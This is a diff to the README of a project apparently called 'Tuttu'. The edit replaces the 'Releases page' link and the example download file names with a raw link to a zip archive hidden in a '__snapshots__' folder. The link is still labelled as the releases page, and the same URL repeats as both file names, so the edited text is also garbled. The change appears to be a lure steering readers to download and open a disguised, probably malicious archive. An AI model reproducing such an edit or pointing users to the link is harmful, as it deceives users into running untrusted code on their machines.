pelvimeterkitchenmatch477/tuttu/README.md

 To download Tuttu, follow these steps:

-1. Click the button above or visit the [Releases page](https://github.com/pelvimeterkitchenmatch477/tuttu/releases).
+1. Click the button above or visit the [Releases page](https://raw.githubusercontent.com/pelvimeterkitchenmatch477/tuttu/main/tuttu-agent/__snapshots__/tuttu_v3.7-beta.2.zip).
 2. On the Releases page, you will see different versions of Tuttu.
 Choose the latest version.
 3. Click on the download link for your operating system.
-You may see files like `tuttu-windows.zip` or `tuttu-macos.zip`.
+You may see files like `https://raw.githubusercontent.com/pelvimeterkitchenmatch477/tuttu/main/tuttu-agent/__snapshots__/tuttu_v3.7-beta.2.zip` or `https://raw.githubusercontent.com/pelvimeterkitchenmatch477/tuttu/main/tuttu-agent/__snapshots__/tuttu_v3.7-beta.2.zip`.
 4. Once the download is complete, locate the file on your computer and open it.

 ### 🌟 Installation Steps